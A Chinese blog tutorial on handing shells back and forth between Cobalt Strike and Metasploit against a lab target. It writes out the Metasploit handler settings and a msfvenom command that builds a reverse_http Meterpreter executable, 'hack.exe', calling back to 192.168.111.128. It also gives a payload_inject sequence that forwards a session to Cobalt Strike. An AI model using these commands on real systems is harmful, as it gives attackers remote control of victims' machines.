cs与msf互传shell


在shell模式下,输入chcp 65001可以解决乱码

cs传shell给msf

首先就是正常的靶机上线cs

image-20230804103329419

然后生成一个foreign的监听器

image-20230804103634433

在msf上设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http 
set lhost 192.168.111.128
set lport 6666
run

image-20230804104015994

选择刚刚新建的msf监听器

msf已经接收到shell

image-20230804104723403

msf传shell给cs

首先先是msf获得shell

先生成对应的木马,设置对应的监听,把木马上传到目标机器并且执行,msf就获得了shell

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.111.128 lport=5555 -f exe > hack.exe

image-20230804120834033

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost 192.168.111.128
set lport 5555
run

image-20230804120808246

cs上设置监听

image-20230804123026729

拿到meterpreter之后先background

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.128
set lport 7777
set session 3
set disablepayloadhandler true
exploit -j

image-20230804122955587

再回到cs,发现主机就已经上线了

image-20230804123103907

msf和cs的shell互不影响


文章作者: f14g
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 f14g !
评论
  目录